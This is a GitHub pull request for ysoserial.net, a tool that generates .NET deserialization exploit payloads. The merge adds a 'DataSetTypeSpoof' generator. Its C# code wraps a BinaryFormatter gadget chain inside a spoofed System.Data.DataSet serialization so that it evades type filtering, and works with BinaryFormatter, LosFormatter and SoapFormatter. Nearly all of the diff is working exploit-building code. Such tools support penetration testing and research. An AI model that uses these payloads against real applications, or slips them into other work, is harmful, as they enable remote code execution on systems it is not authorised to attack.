Merge pull request #120 from testanull/add-dataset-type-spoofing

Add dataset type spoofing
pwntester · Jun 30, 2022 · 5645c62 · 5645c62
2 parents bc85b30 + d848a2c
commit 5645c62
Show file tree

Hide file tree

Showing 3 changed files with 105 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -46,6 +46,8 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
 		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 	(*) DataSet
 		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
+	(*) DataSetTypeSpoof
+		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 	(*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
 		Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
 	(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]

diff --git a/ysoserial/Generators/DataSetTypeSpoofGenerator.cs b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Data;
+using System.IO;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+    public class DataSetTypeSpoofGenerator : DataSetGenerator
+    {
+        public override string Name()
+        {
+            return "DataSetTypeSpoof";
+        }
+
+        public override string Contributors()
+        {
+            return "Soroush Dalili, Markus Wulftange, Jang";
+        }
+
+        public override object Generate(string formatter, InputArgs inputArgs)
+        {
+            byte[] init_payload =
+                (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
+            DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
+            if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
+                || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
+                || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
+            {
+                return Serialize(payloadDataSetMarshal, formatter, inputArgs);
+            }
+            else
+            {
+                throw new Exception("Formatter not supported");
+            }
+        }
+    }
+
+    // https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
+    [Serializable]
+    public class DataSetSpoofMarshal : ISerializable
+    {
+        byte[] _fakeTable;
+
+        public void GetObjectData(SerializationInfo info, StreamingContext context)
+        {
+            // info.SetType(typeof(System.Data.DataSet));
+            info.AssemblyName = "mscorlib";
+            info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
+            info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
+            info.AddValue("DataSet.DataSetName", "");
+            info.AddValue("DataSet.Namespace", "");
+            info.AddValue("DataSet.Prefix", "");
+            info.AddValue("DataSet.CaseSensitive", false);
+            info.AddValue("DataSet.LocaleLCID", 0x409);
+            info.AddValue("DataSet.EnforceConstraints", false);
+            info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
+            info.AddValue("DataSet.Tables.Count", 1);
+            info.AddValue("DataSet.Tables_0", _fakeTable);
+        }
+
+        public void SetFakeTable(byte[] bfPayload)
+        {
+            _fakeTable = bfPayload;
+        }
+
+        public DataSetSpoofMarshal(byte[] bfPayload)
+        {
+            SetFakeTable(bfPayload);
+        }
+
+        public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
+        {
+            // This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
+        }
+
+        public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
+        {
+            MemoryStream stm = new MemoryStream();
+            if (inputArgs.Minify)
+            {
+                ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
+                    new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
+                fmtLocal.Serialize(stm, fakeTable);
+            }
+            else
+            {
+                BinaryFormatter fmt = new BinaryFormatter();
+                fmt.Serialize(stm, fakeTable);
+            }
+
+            SetFakeTable(stm.ToArray());
+        }
+
+        public DataSetSpoofMarshal(MemoryStream ms)
+        {
+            SetFakeTable(ms.ToArray());
+        }
+    }
+}
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
@@ -158,6 +158,7 @@
     <Compile Include="Generators\AxHostStateGenerator.cs" />
     <Compile Include="Generators\ClaimsPrincipalGenerator.cs" />
     <Compile Include="Generators\DataSetGenerator.cs" />
+    <Compile Include="Generators\DataSetTypeSpoofGenerator.cs" />
     <Compile Include="Generators\ObjRefGenerator.cs" />
     <Compile Include="Generators\ResourceSetGenerator.cs" />
     <Compile Include="Generators\SessionSecurityTokenGenerator.cs" />